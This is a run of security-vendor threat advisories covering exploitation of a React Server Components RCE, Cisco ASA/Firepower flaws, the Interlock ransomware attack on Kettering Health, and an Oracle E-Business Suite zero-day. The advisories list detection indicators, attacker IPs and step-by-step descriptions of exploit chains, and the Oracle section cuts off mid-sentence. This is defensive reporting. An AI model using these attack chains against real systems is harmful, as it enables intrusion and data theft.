@vitejs/plugin-rsc@latestreact-server-dom-parcelnpm install react@latest react-dom@latest react-server-dom-parcel@latestreact-server-dom-turbopacknpm install react@latest react-dom@latest react-server-dom-turbopack@latestreact-server-dom-webpacknpm install react@latest react-dom@latest react-server-dom-webpack@latestExploit ProcessProof-of-concepts (PoCs) have been published relating to this CVE. The exploitation of this vulnerability has followed a systematic and opportunistic structure with attributes that correlate the activity with state-sponsored threat actors. (Amazon, 2025). Their multi-stage methodology for exploitation observed:Automated Scanning The use of these automated scanning tools is used for broad-spectrum vulnerability detection and is leveraged in conjunction with a number of anti-detection techniques like user-agent randomization for the evasion of security monitoring.Targeted Debugging Specific threat clusters follow up automated scans with active, manual exploitation and debugging against vulnerable targets. This involves persistent, extended attempts to refine attack payloads, including attempts to execute Linux commands, write files and read sensitive system files.Vulnerability Daisy-Chaining Concurrent exploitation of other 0 and N-day vulnerabilities were observed by Amazon threat intelligence teams to enhance the successful exploitation of vulnerable targets. (Amazon, 2025)Suspected Exploiting Threat ActorsThreat actors appear to have prioritized the rapid weaponization of any available exploit, leading to high-volume scanning with flawed public PoCs for speed over accuracy. This volume-based approach generates significant log noise that can be leveraged to mask more sophisticated and persistent attacks aimed at bypassing security controls.It is suspected that there is a state-sponsored element to the exploitation of CVE-2025-55182. Analysis from multiple sources observed the use of historically malicious infrastructure by PRC-nexus threat actors like Earth Lamia and Jackpot Panda. The large-scale use of shared anonymization networks and the Chinese-associated ASN infrastructure further this attribution. (Amazon, 2025) GreyNoise have observed 56 associated IPs with this vulnerability's exploitation and their data reflects this observation. (GreyNoise, 2025)Earth LamiaA Chinese state-sponsored threat actor active since 2023, primarily targets organizations in the finance, logistics, retail, IT, education, and government sectors across Brazil, India, and Southeast Asia. The group's operational methods include exploiting publicly known vulnerabilities.Jackpot Panda Active throughout 2023 and into 2025, the China-nexus threat actor JACKPOT PANDA has evolved its operations, moving from deploying sophisticated trojanized executables with custom malware like the CplRAT-related XShade implant, to exploiting supply chain vulnerabilities. The group consistently exploits trusted relationships and newly disclosed flaws. Their tactics include exploitation of public-facing applications and client execution methods.IOCsNetwork-based:Malicious HTTP POST Requests Observed HTTP POST requests targeting application endpoints that include specific, potentially triggering, HTTP headers like next-action or rsc-action-id.Command Injection Patterns Request bodies within these POST requests contained anomalous patterns, specifically the $@ string, which is often used in attempts at command injection or exploitation.Suspicious Response Patterns Request bodies exhibited the pattern "status":"resolved_model", which could indicate a specific response or status message related to the malicious activity or exploit payload execution.Host-based:Unexpected Reconnaissance Commands Execution of common system reconnaissance commands (whoami, id, uname) originating from unexpected sources or contexts, suggesting the attacker is attempting to map the compromised environment.Sensitive File Access Attempts to read the etc/passwd file, a key step in gathering system user information for potential privilege escalation or lateral movement.Suspicious File Writes The creation of new, unexpected files in the volatile /tmp/ directory (e.g., a file named pwned.txt), which often serves as a staging area for malicious tools or results.Anomalous Process Spawning The appearance of new, unauthorized child processes that were initiated by the typically constrained Node.js/React application processes, indicating successful code execution or compromise of the application layer.Infrastructure:GreyNoise have tagged multiple IPs associated with the exploitation of this vulnerability. They can be found here: GreyNoise, 2025 . Additionally AWS stated threat actor infrastructure used as:IP Address, Date of Activity, Attribution206[.]237.3.150, 2025-12-04, Earth Lamia45[.]77.33.136, 2025-12-04, Jackpot Panda143[.]198.92.82, 2025-12-04, Anonymization Network183[.]6.80.214, 2025-12-04, Unattributed threat clusterCVE-2025-55182 presents a significant risk to organizations who run React v19 or React Server, it is paramount to clarify what version the organizations running and if it is public facing and remediate according to React’s advisories.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Resourceshttps://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-componentshttps://www.aikido.dev/blog/react-nextjs-cve-2025-55182-rcehttps://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rcehttps://www.helpnetsecurity.com/2025/12/04/react-node-js-vulnerability-cve-2025-55182/https://cloud.google.com/blog/products/identity-security/responding-to-cve-2025-55182https://socket.dev/blog/critical-security-vulnerability-in-react-server-componentshttps://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/https://www.tenable.com/cve/CVE-2025-66478https://www.tenable.com/cve/CVE-2025-55182https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-componentshttps://cwe.mitre.org/data/definitions/502.htmlhttps://vercel.com/changelog/cve-2025-55182https://viz.greynoise.io/query/cve:CVE-2025-55182https://react2shell.com/ --- ### [Urgent Advisory: Active Exploitation of Cisco ASA and Firepower, CVE-2025-20333 & CVE-2025-20362](https://www.centripetal.ai/threat-research/urgent-advisory-active-exploitation-of-cisco-asa-and-firepower-cve-2025-20333-cve-2025-20362) Published: 2025-11-14 Summary: CISA has issued Emergency Directive 25-03 following active exploitation of critical Cisco ASA and Firepower vulnerabilities. Agencies must immediately update devices, verify true patch status, and… CISA has issued Emergency Directive 25-03 in response to actively exploited critical vulnerabilities in Cisco ASA and Firepower devices (CVE-2025-20333: Remote Code Execution; CVE-2025-20362: Privilege Escalation). These security flaws enable remote threat actors to bypass authentication to access restricted URL endpoints and execute code on vulnerable Cisco appliances. If chained, these vulnerabilities allow a remote, unauthenticated actor to gain complete control of an unpatched device. Verification activities have identified a critical compliance gap: devices reported as "patched" are running software versions that remain vulnerable, and CISA is tracking active exploitation of these versions within FCEB agencies. This guidance clarifies that a device is considered patched only when running a software version that mitigates both CVEs. The directive requires agencies to immediately update all ASA and Firepower devices including internal, non-public-facing systems to specified minimum software versions, and to implement additional mitigation actions for devices that remain unpatched or were updated after September 26, 2025. (Centripetal, 2025)Impacted VersionsProductSoftware Release TrainRecommended Fixed ReleaseStatus / NotesCisco FTD Software7.1Not AvailableUpgrade to a newer, fixed release train.Cisco FTD Software7.27.2.10.2Standard release patch.Cisco FTD Software7.3Not AvailableUpgrade to a newer, fixed release train.Cisco FTD Software7.47.4.2.4Standard release patch.Cisco FTD Software7.67.6.2.1Standard release patch.Cisco FTD Software7.77.7.10.1Standard release patch.Fig 1: Vulnerable Configuration Snippet for Cisco Secure Firewall FTD (Cisco, 2025)ProductSoftware Release TrainRecommended Fixed ReleaseStatus / NotesCisco ASA Software9.129.12.4.72Direct patch for impacted EoL versions.Cisco ASA Software9.149.14.4.28Direct patch for impacted EoL versions.Cisco ASA Software9.169.16.4.85Standard release patch.Cisco ASA Software9.17Not AvailableUpgrade to a newer, fixed release train.Cisco ASA Software9.189.18.4.67Standard release patch.Cisco ASA Software9.19Not AvailableUpgrade to a newer, fixed release train.Cisco ASA Software9.29.20.4.10Standard release patch.Cisco ASA Software9.229.22.2.14Standard release patch.Cisco ASA Software9.239.23.1.19Standard release patch.Fig 2: Vulnerable Configuration Snippet for Cisco Secure ASA (Cisco, 2025)Mitigation StepsWhere applicable patch immediately according to the above table. No workarounds are available to address these vulnerabilities.Validate that WebVPN services are not enabled to ensure a device is not public-facing.For all Public-Facing ASA or FTD instancesDaily ChecksPerform the following checks once per day:Configuration Review Examine running-config and startup-config for unauthorized changes. Look for:Newly created or unfamiliar user accounts.Alterations to the AnyConnect WebVPN client configuration.Modifications that lower security (e.g., SSH vs. Telnet, weak SNMP configurations).Unfamiliar IPSec tunnels or site-to-site VPNs.WebVPN Customization Review Run show import webvpn AnyConnect-customization. Search the output for .pdf and .bat files not validated as legitimate.Filesystem Search Run dir /recursive disk0: to list active contents. Review for the same suspect .pdf or .bat files. The command dir /recursive all-filesystems provides a more verbose listing. If possible, acquire the eUSB to search for deleted items in unallocated space.4-Hour ChecksRun the show checkheaps command every 4 hours:Confirm and notate the time of the show checkheaps command.Copy and save the output to an isolated, external system.Wait 5 or more minutes and run the command again.Observe the "Total number of runs" value in the last row. This value should increase by approximately 1 every 60 seconds (e.g., an increase of ~5 over five minutes).If there is no observable positive change, this indicates a potential compromise.Continuous MonitoringContinuously examine syslog eventsLogin Events Review logs for impossible travel or logon activity. Enable informational level syslogs (if disabled) and consider enabling debug level syslogs.%ASA-6-716002: WebVPN session terminated: Idle Timeout%ASA-7-722029: SVC Service Termination%ASA-7-722030: SVC Service Termination%ASA-7-722031: SVC Service TerminationCommand Execution Review logs from an external repository (e.g., SIEM) for the following message IDs:%ASA-7-111009: User 'user' executed cmd: string%ASA-5-111010: %ASA-5-111008: User 'user' executed the 'string' command.%ASA-5-111008: User, running application-name from IP, executed cmd.Hunt for commands such as "import webvpn anyConnect-customization", which will also cover more specific variations.Unpatched Cisco ASA 5500-X Series GuidanceFor unpatched public-facing ASA 5500-X appliances without secure boot capabilities (e.g., 5555-X, 5545-X, 5525-X, 5585-X) hosting WebVPN services, perform the following actions in addition to the above steps.Daily Check (Prior to 1200 Local Time)Collect a core dump and submit it for processing (e.g., to Malware NextGen) per the Core Dump and Hunt Instructions for ED 25-03.4-Hour ChecksPerform the following checks every 4 hours:Implant Check Run the following command. Any output indicates compromise. Save the output to an isolated, external system.more /binary system:/text | grep 55534154 41554156 41575756 488bb3a0Heap Check Run the show checkheaps command:Confirm and notate the time of the show checkheaps command.Copy and save the output to an isolated, external system.Wait 5 or more minutes and run the command again.Observe the "Total number of runs" value in the last row. This value should increase by approximately 1 every 60 seconds.If there is no observable positive change, this indicates a potential compromise.Recently Patched Device GuidanceFor all public-facing devices patched after September 26, 2025, perform the following actions to check for previous compromise.Review WebVPN Customizations Run show import webvpn AnyConnect-customization. Search the output for references to .pdf and .bat files not validated as legitimate.Examine Command Execution Logs Review logs (preferably from a SIEM) for command execution events.%ASA-7-111009: User 'user' executed cmd: string%ASA-5-111010: %ASA-5-111008: User 'user' executed the 'string' command.%ASA-5-111008: User, running application-name from IP, executed cmd.Hunt for commands such as "import webvpn anyConnect-customization".Search Disk0 Run dir /recursive disk0: (or dir /recursive all-filesystems) and search the output for illegitimate .pdf or .bat files. If possible, acquire the eUSB to search for deleted items in unallocated space.To review the extended attack chain, analysis of this campaign, and for extra material, please consult our October advisory (Centripetal, 2025) and the Cisco Security Advisories CVE-2025-20362 and CVE-2025-20333 which also contains a software checking tool if you require additional support (Cisco, 2025). Full patching to the latest versions on affected devices is strongly advised on all devices as soon as possible.Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Resourceshttps://www.cisa.gov/ed-25-03-guidance-device-updates-and-patching?utm_source=https://www.cisa.gov/ed-25-03-guidance-device-updates-and-patching&utm_medium=GovDeliveryhttps://www.cisa.gov/temporary-risk-mitigation-guidance-agencies-process-ed-25-03-compliancehttps://www.cve.org/CVERecord?id=CVE-2025-20333https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUBhttps://www.cve.org/CVERecord?id=CVE-2025-20362https://nvd.nist.gov/vuln/detail/cve-2025-20333https://www.bleepingcomputer.com/news/security/cisa-warns-feds-to-fully-patch-actively-exploited-cisco-flaws/ --- ### [Interlock Ransomware Threat Landscape: Insights from the 2025 Kettering Health Attack](https://www.centripetal.ai/threat-research/kettering-health-attack-interlock-ransomware) Published: 2025-11-04 Summary: How Interlock ransomware compromised Kettering Health, disrupted clinical operations, and led to significant patient data exposure. In 2025, Interlock has rapidly evolved into a high impact ransomware operator leveraging social engineering lures, multi stage payload delivery, and data leak extortion to pressure victims. Security research highlights their use of techniques such as “ClickFix” style deceptive prompts, compromised websites, and stealer tool deployments during initial access phases. (Sekoia, 2025)The attack on Kettering Health serves as the year’s defining example, with the group claiming theft of 941 GB of sensitive data and healthcare operations reporting significant service disruptions following the incident (Dayton Daily News,2025)About InterlockInterlock conducts coordinated multi stage ransomware campaigns that rely on social engineering for initial access, followed by credential harvesting, data theft, and high impact encryption across a range of operating systems. Public reporting consistently shows the group prioritizing double extortion, stealing large volumes of sensitive data before deploying ransomware to increase pressure on victims. Interlock has been observed targeting organizations in the healthcare and public services sectors. Reported victims include DaVita, Texas Tech University Health Science Center, Drug and Alcohol Treatment Services, Brockton Neighborhood Health Center, and Naper Grove Vision Care, along with their most significant attack of 2025 involving Kettering Health.Kettering Health Attack DetailsKettering Health is a non-profit healthcare system in western Ohio that operates a large network of hospitals, specialty centers, and outpatient clinics. It includes roughly 14 medical centers and more than 120 care locations, supported by a workforce of thousands of physicians and staff. In May 2025, the organization suffered a ransomware attack in which the Interlock group gained unauthorized access from April 9 to May 20 and accessed or copied sensitive patient data. The attack caused a system wide outage, disrupted operations, and led to the leak of approximately 941 GB of stolen data. Core systems, including Epic and MyChart, were restored in early June, and security enhancements were implemented. The breach was reported to HHS with a placeholder of 501 affected individuals, though the final total is still pending. (HIPAA Journal, 2025)The following timeline was compiled by The HIPAA Journal:Apr 9, 2025: Interlock gains unauthorized access to Kettering Health’s network.May 20, 2025: Attack is detected; system-wide outage forces staff to revert to manual processes.May 21–30, 2025: Public updates issued; warnings released about scam calls, texts, and emails.Jun 2–3, 2025: Core Epic EHR functionality is restored; emergency departments return to normal operations.Jun 5, 2025: Interlock leaks approximately 941 GB of stolen data on its dark web site. (Figure 2)Jun 9–10, 2025: Surgeries, imaging, pharmacy services, physician visits, and full MyChart access resume.Jun 13, 2025: Normal operations for key services confirmed.Jul 21, 2025: Breach reported to HHS with a placeholder count of 501 individuals.Oct 17, 2025: Review confirms extensive patient information was compromised.Figure 1 below provides a visual summary of the attack sequence, from the initial compromise through data theft, ransomware deployment, and operational disruption.Figure 1. Interlock Ransomware attack’s sequence on Kettering HealthFigure 2. Kettering Health Files Exposed in the Worldwide Secrets Blog ( Sourced from RansomLook)Operational ModelInterlock operates as a privately run ransomware group, not a traditional RaaS program. Research indicates no public affiliate recruitment, and campaigns appear to be conducted by a single, centralized operator rather than a large affiliate ecosystem. The group also maintains a private leak site known as the “Worldwide Secrets Blog”, which is used to publish sensitive data stolen from victims who refuse to pay. The site functions as the group’s public pressure mechanism, listing victim organizations, displaying breach announcements, and hosting links to leaked files. (Figure 2)Figure 3. Example view of the Worldwide Secrets Blog interface (Sourced from Sekoia)The group’s operations are further characterized by:Financial motivation, with extortion as the primary objective.Double extortion tactics, stealing sensitive data before encryption to strengthen leverage.Social engineering based initial access, often via fake update prompts or malicious redirects.Credential harvesting using stealer malware or lightweight backdoors to expand access.Lateral movement through legitimate remote services and compromised accounts.Data staging and exfiltration prior to deploying ransomware payloads.Multi platform ransomware deployment, enabling impact across Windows, Linux, BSD, and ESXi.Leak site extortion, where stolen data is published to pressure victims into paying.Delivery and Attack ChainInterlock relies on delivery methods that mimic normal software activity, according to Arctic Wolf (ArticWolf, 2025). The group often compromises legitimate websites and turns them into fake update pages that prompt users to run commands or installers that appear routine. This approach blends into expected browser behavior and helps the intrusion bypass traditional endpoint defenses. Interlock has also been observed using the ClickFix social engineering technique, a method that presents users with false security or update prompts and guides them to run a copied PowerShell command. This tactic exploits user trust in familiar system messages and provides a reliable path for delivering the initial payload. (Centripetal, 2025)Initial AccessUsers are redirected to a fake browser update or ClickFix page hosted on a compromised site.Victims are instructed to run an installer or paste a command, believing they are correcting an issue or updating their browser.A legitimate Chrome or Edge installer may run as a decoy while a malicious PowerShell script executes silently in the background.The script becomes the initial foothold, gathering basic system information and opening communication with attacker infrastructure.Execution and StealthThe PowerShell backdoor runs without a visible window and relaunches itself to remain hidden from the user.It regularly contacts remote servers for new instructions or payloads.Obfuscated commands and encoded strings are used to avoid simple signature-based detection.At this stage, Interlock operators may deploy tools such as Interlock RAT or NodeSnake RAT for command execution and remote control.Persistence and ToolingSome script versions add persistence through registry changes to ensure the backdoor remains active after reboot.The attackers may download a credential stealer or keylogger through PowerShell to collect credentials for lateral movement.Tools such as Azure Storage Explorer and AzCopy have been reported for accessing and uploading data to cloud storage.Data exfiltration can also involve WinSCP or similar file transfer utilities.Infrastructure and EvasionEarly communication often passes through TryCloudflare tunnels, using temporary subdomains that resemble normal Cloudflare use.This helps blend command and control traffic into legitimate patterns and makes it harder to block the attacker’s infrastructure.Interlock Operational EcosystemThe group operates within a broader ecosystem that supports its delivery methods and post compromise activity (Sekoia, 2025). The following tables provide a condensed overview of the tooling and techniques observed across Interlock operations:ToolsCategoryToolsPurposeTTPStealersLummaC2, BerserkStealerCredential theft and browser data harvestingCredential access, session theft, reconnaissanceMalicious ScriptsObfuscated PowerShell commandsPayload retrieval and executionCommand execution, defense evasion, script-based deliveryCampaign TechniquesTechniqueDescriptionTTPClickFix / Fake UpdatesFake update or fix prompts that trick users into running PowerShell commandsSocial engineering, user execution, initial accessClearFake-style RedirectsRedirect chains leading to fake update or alert pagesDrive-by compromise, malicious redirectionFake Browser AlertsDeceptive browser messages or reCAPTCHA-style promptsSocial engineering, user executionCopy, Paste Execution FlowVictims copy and run malicious PowerShell commandsCommand execution through user interactionObfuscated Script DeliveryEncoded and obfuscated commands used to evade detectionDefense evasion, obfuscated files/scriptsRotating Malicious DomainsUse of many short-lived domains tied to the ecosystemInfrastructure rotation, domain fluxingCentripetal’s PerspectiveAs Interlock continues conducting ransomware operations across multiple sectors, Centripetal is performing focused analysis on external indicators associated with the group to better understand its infrastructure, delivery methods, and operational patterns. By compiling known indicators linked to Interlock, we can identify the consistent behaviors that define the group’s external operations and campaign activity. This intelligence driven approach provides a clearer picture of how Interlock operates and supports ongoing efforts to track changes in its tactics and external footprint.Centripetal’s internal analysis of indicators associated with the Interlock ransomware group aligns closely with findings published by several leading security firms. The distribution of observed activity across business sectors within our customer base mirrors what has been documented in external reporting, reinforcing the accuracy of our assessment and confirming that Interlock’s targeting patterns remain consistent across independent intelligence sources.A notable example comes from Hunter Strategy’s 2025 (Hunter Strategy, 2025) threat assessment on Interlock, which reports results consistent with our own analysis. As shown in Figure 3, more than 59 percent of events matching indicators associated with known Interlock activity were observed within the healthcare sector across Centripetal’s customer base. Hunter Strategy’s insights (Figure 4) reflect the same trend, further validating the accuracy of our attribution and the reliability of the indicators identified within Centripetal’s datasets.Figure 4. Indicators of Compromise Identified in Centripetal’s Customer Base by SectorFigure 5. Distribution of Attacks by Sector (Sourced from Hunter Strategy)The consistency of these findings is further supported when comparing them with the attack timeline shown in Figure 5. Since December 2024, eight healthcare related attacks have been registered and attributed to Interlock, making healthcare the top targeted sector. This observation reinforces Centripetal’s own results, which show that healthcare organizations consistently generate the highest volume of matched indicators and attempted activity linked to Interlock’s infrastructure across our customer environments.When viewed alongside sector distribution data and external assessments, the updated timeline provides additional confirmation. Interlock’s operational tempo and targeting preferences remain steady, with healthcare serving as its primary point of impact. The alignment between our internal telemetry, Hunter Strategy’s analysis, and publicly documented attack sequences reflects a coherent pattern of behavior that underscores the group’s sustained and deliberate campaign strategy. Interlock continues to prioritize high value environments where operational disruption has immediate and severe consequences.Figure 6. Attack Timeline By month and Industry Distribution (Sourced from Hunter Strategy)To contrast these findings with the previous attack timeline, we analyzed indicators in Centripetal’s threat intelligence month by month to align with periods where Interlock demonstrated the highest activity. During April 2025, nine attacks were recorded according to the referenced analysis. To illustrate the pace at which indicators are identified, incorporated, and deployed within Centripetal’s threat intelligence and across our customer environments, the graphs in Figure 6 show the progression of coverage for these indicators of compromise as attacks unfolded throughout the second quarter of 2025.Figure 7. Indicators of Compromise Coverage ( Sourced from Centripetal)Because ransomware indicators require verification and are often sourced from ongoing or undisclosed investigations, they are rarely available immediately after an attack. This delay means that the progression of coverage in the previous graphs reflects both the discovery of new indicators and the gradual release of validated intelligence over time.The spike in attack volume between February and April shown in Hunter Strategy’s timeline (Figure 7) also aligns with the rapid increase in IOC coverage observed within Centripetal’s datasets during the same period. As Interlock intensified its operational activity, a corresponding surge of validated indicators entered our threat intelligence pipeline, resulting in the noticeable rise in coverage depicted in Figure 6. This correlation demonstrates that Centripetal’s IOC expansion closely tracks real world attack tempo, with peaks in adversary activity directly reflected in the pace at which indicators are identified, enriched, and deployed across our defenses.Figure 8. Interlock Evolution Timeline (Sourced from Hunter Strategy)Another strong indicator of Interlock’s operational model is the distribution of IOCs by tactic. Centripetal’s threat intelligence not only identifies malicious infrastructure but also classifies indicators based on the role they play within the attack chain. As shown in Figure 8, analysis of 82 domains attributed to Interlock reveals that over half support malware delivery, command and control activity, or phishing operations. These categories align closely with Interlock’s known reliance on staged payload servers, short lived C2 infrastructure, and email based initial access. The remaining domains function as redirectors or auxiliary infrastructure that supports execution and lateral movement. This distribution reinforces broader industry reporting on Interlock’s tactics and validates the accuracy of Centripetal’s indicator attribution.Figure 9. Percentage of 82 Domain Indicators Associated with a Tactic (Sourced from Centripetal)Coverage analysis of 85 Interlock attributed domains further validates the strength of Centripetal’s threat intelligence, with 96.5% already incorporated into our detection and shielding capabilities at the time of evaluation. This high level of coverage demonstrates the effectiveness of our intelligence ingestion pipeline and its ability to rapidly absorb and deploy indicators associated with active ransomware campaigns. The small portion of domains not yet covered reflects the typical delay between the moment an IOC first appears in the wild and when it becomes publicly documented or validated by Intelligence sources. Overall, the results reinforce that Centripetal is proactively shielding customers from the vast majority of Interlock’s known malicious infrastructure.Figure 10. BDN Inclusion Coverage (Sourced from Centripetal)Overall, the alignment between Centripetal’s telemetry, external reporting, and IOC coverage shows that Interlock remains a focused and consistent ransomware threat, with healthcare continuing to be its primary target. The group’s reliance on social engineering, staged payload delivery, and short lived infrastructure is reflected across both internal and third party datasets, reinforcing confidence in the indicators attributed to its operations. Centripetal’s rapid integration of validated IOCs ensures strong visibility into Interlock’s activity and supports proactive protection for customer environments as the group’s campaigns continue to evolve.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesThe HIPAA Journal - Kettering Health Confirmed Patient Data Compromised in May 2025 Ransomware AttackKettering Health - Cybersecurity IncidentDayton Daily News- Ransomware group claims it stole more than 730,000 files from Kettering HealthSecurity Week - Ransomware Gang Leaks Alleged Kettering Health DataIndustrial Cyber - Ransomware suspected in Kettering Health cyberattack disrupting patient services, canceling elective proceduresCISA - #StopRansomware: InterlockArctic Wolf - Threat Actor Profile: Interlock RansomwarePicus Security - Interlock Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-203ASekoia - Interlock ransomware evolving under the radar (IOCs extracted)Fortinet - Ransomware Roundup - InterlockSocPrime - Interlock Ransomware Detection: The FBI, CISA, and Partners Issue Joint Alert on Massive Attacks via the ClickFix Social Engineering TechniqueForescout - A Year Later, Interlock Ransomware Keeps Leveling UpTalos Intelligence - Unwrapping the emerging Interlock ransomware attackGitHub - IOCs (Cisco-Talos Repo)GutHub - IOCs (ESentire Repo)ThreatFox - Interlock associated IOCsCentripetal - ClickFix and the New Era of Social EngineeringHunter Strategy - The Rise of Interlock Ransomware Group --- ### [Oracle E-Business Suite Zero Day Enables Remote Code Execution](https://www.centripetal.ai/threat-research/oracle-e-business-suite-zero-day-enables-remote-code-execution) Published: 2025-10-24 Summary: A critical zero-day (CVE-2025-61882) in Oracle E-Business Suite’s BI Publisher integration enables unauthenticated remote code execution. Actively exploited in the wild, the flaw allows attackers to… CVE-2025-61882 is a critical remote code execution (RCE) vulnerability in Oracle E-Business Suite’s Concurrent Processing/BI Publisher integration components. The flaw arises from insecure handling of XML-based template inputs and SSRF-capable parameters that can be abused to load and execute malicious XSLT stylesheets. Unauthenticated, network-accessible attackers can send crafted HTTP requests to BI Publisher endpoints to trigger arbitrary code execution in the context of the EBS application process.The vulnerability requires no authentication or user interaction and has been weaponized in the wild, with multiple incident response teams confirming active exploitation. Attackers have leveraged template injection and XSLT extension functions to achieve RCE, subsequently deploying web shells, reverse shells, and data-theft tooling. Compromised instances have been used for credential harvesting, lateral movement, and extortion-driven data exfiltration (Oligo Security, 2025; WatchTowr, 2025).The vulnerability affects supported Oracle EBS 12.2.x releases (vendor advisories cite 12.2.3–12.2.14 as within the affected range), has been assigned a CVSS v3.1 base score of 9.8 (Critical) due to its low complexity and high impact on confidentiality, integrity, and availability, and should be remediated immediately by applying Oracle’s security updates or by blocking public access to affected BI Publisher/Concurrent Processing endpointsVulnerability Type (CWE)CWE-287: Improper Authentication (NIST) Occurs when a software system does not correctly verify the identity of users or services before granting access. This weakness allows attackers to bypass authentication controls, access restricted functions or data, and potentially execute arbitrary code or gain elevated privileges without valid credentials.CVSS ScoreBase Score: 9.8 (Critical)Attack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: None (PR:N)User Interaction: None (UI:N)Scope: Unchanged (S:U)Impact on CIA: HighConfidentiality: High (SC:H)Integrity: High (SI:H)Availability: High (SA:H)Impacted VersionsProductVulnerable versionOracle E-Business Suitev12.2.3-12.2.14Exploit ProcessAnalysis from both CrowdStrike and WatchTowr indicates that exploitation of CVE-2025-61882 follows at least two distinct but related attack chains, each achieving unauthenticated remote code execution (RCE) against Oracle E-Business Suite (EBS). While CrowdStrike’s telemetry highlights a template-upload-based RCE via BI/XML Publisher, WatchTowr’s independent analysis documents a server-side request forgery (SSRF) and XSLT-based code-execution chain. Both vectors result in attacker-controlled code execution in the EBS application context.Exploit Chain 1 - Template Upload & Code Execution (CrowdStrike, 2025)Phase 1: Reconnaissance & Target EnumerationThreat actors conducted internet-wide scanning to identify EBS instances exposing HTTP endpoints such as /OA_HTML/SyncServlet and /OA_HTML/RF.jsp.Scanning activity sharply increased following Oracle’s public disclosure on October 4 2025, consistent with opportunistic exploitation behavior (CrowdStrike, 2025).Phase 2: Authentication Bypass (Initial Access)Intrusions typically begin with a POST request to /OA_HTML/SyncServlet, which triggers an authentication-bypass condition that allows unauthorized interaction with administrative EBS components.In some cases, the bypass targeted administrator-level EBS accounts directly (CrowdStrike, 2025).Phase 3: Malicious Template Upload & ExecutionPost-bypass, adversaries abused the XML Publisher Template Manager by issuing GET and POST requests to endpoints such as /OA_HTML/RF.jsp and /OA_HTML/OA.jsp.A malicious XSLT template was uploaded and executed when previewed. Commands embedded in the XSLT file ran within the EBS application process, granting remote code execution (CrowdStrike, 2025).Phase 4: Outbound Callback & Payload RetrievalOnce executed, the template caused the Java web server process to establish outbound HTTPS connections (commonly over port 443) to attacker-controlled infrastructure to fetch additional payloads, including web shells or downloaders (CrowdStrike, 2025).Phase 5: Web Shell Deployment & PersistenceThe follow-on payloads established persistent web shells, providing command execution and long-term access.In one confirmed case, attackers uploaded FileUtils.java (a downloader) and Log4jConfigQpgsubFilter.java (a backdoor). Together they formed an in-memory filter-chain web shell, invoked via the servlet filter process when a specific endpoint (/OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/) was accessed.This allowed memory-resident code execution without leaving easily detectable artifacts on disk (CrowdStrike, 2025).Phase 6: Post-Exploitation ActionsFollowing successful compromise, attackers engaged in data discovery, credential harvesting, and exfiltration staging within EBS data stores and configuration directories.CrowdStrike attributes portions of this behavior to GRACEFUL SPIDER, a financially motivated group with a history of extortion operations (CrowdStrike, 2025).Exploit Chain 2 - SSRF to XSLT Code Execution (WatchTowr, 2025), 2025).the EBS application process, granting remote code execution (CrowdStrike, 2025).Stage 1: Server-Side Request Forgery (SSRF)Attackers send a crafted XML payload to servlet endpoints such as /OA_HTML/configurator/UiServlet using the getUiType parameter.Inside the XML, the return_url parameter is set to an attacker-controlled URL.The application later contacts this URL directly, allowing attackers to force the server to make outbound HTTP requests, a classic SSRF condition (WatchTowr, 2025).Stage 2: CRLF Injection (Header Manipulation)By encoding newline characters (CRLF) within the return_url, attackers inject arbitrary HTTP headers or modify the structure of the outbound request.This allows transformation of GET requests into POSTs or inclusion of custom headers, expanding control over the SSRF-initiated communication (WatchTowr, 2025).Stage 3: Connection Reuse (Keep-Alive)Attackers maintain a persistent TCP session via HTTP keep-alive, reusing the same connection for subsequent requests.This technique increases stealth and reliability, reducing connection noise and enabling multiple exploit steps within a single session (WatchTowr, 2025).Stage 4: Internal Service Access & Path TraversalThe SSRF is leveraged to reach internal EBS services bound to private IPs or hostnames listed in etc/hosts.Path traversal sequences (e.g., /OA_HTML/help/../ieshostedsurvey.jsp) are used to bypass access filters and interact with internal endpoints that are normally restricted (WatchTowr, 2025).Stage 5: XSLT Injection & Remote Code ExecutionThe targeted internal endpoint (ieshostedsurvey.jsp) constructs a URL for an XSL stylesheet based on incoming request headers.By controlling the Host header and the SSRF destination, attackers force the server to fetch a malicious XSL file hosted on their infrastructure.The Java XSLT processor executes embedded Java extension functions within the XSL file, leading to arbitrary code execution.Persistent connection reuse ensures the stylesheet download and execution occur reliably within the same TCP session, completing the RCE chain (WatchTowr, 2025).Comparison of the Two Exploit ChainsAspectCrowdStrike Observed ChainWatchTowr Observed ChainInitial VectorAuth bypass via /SyncServletSSRF via /UiServletPrimary MechanismMalicious XSLT template upload (BI Publisher)Malicious XSL stylesheet fetch (ieshostedsurvey.jsp)Execution ContextTemplate preview → XSLT executionXSLT parsing via SSRF-controlled fetchPersistenceWeb shell (FileUtils.java + Log4jConfigQpgsubFilter.java)Connection reuse (keep-alive)Authentication RequirementUnauthenticated (bypass)Unauthenticated (SSRF)Observed OutcomeOutbound C2 over port 443, persistent shellDirect in-process RCE via malicious XSLBoth exploit paths demonstrate how adversaries leveraged Oracle EBS’s web-facing components and XML/XSLT processing logic to achieve unauthenticated RCE.While the CrowdStrike chain exploited legitimate template management features to upload malicious content, the WatchTowr chain abused SSRF and header manipulation to indirectly deliver a malicious stylesheet for code execution.In both cases, exploitation required no valid credentials and relied entirely on legitimate EBS functionality being misused, making traditional perimeter-based detection insufficient.Mitigation StepsApply the Oracle Security Alert Fixes For CVE-2025-61882 immediately (for patch links and installation instructions, please consult the Oracle Security Alert page).Where Immediate Patching is Not Possible Restrict network access to EBS Concurrent Processing/BI Publisher and Configurator Servlet endpoints. Place 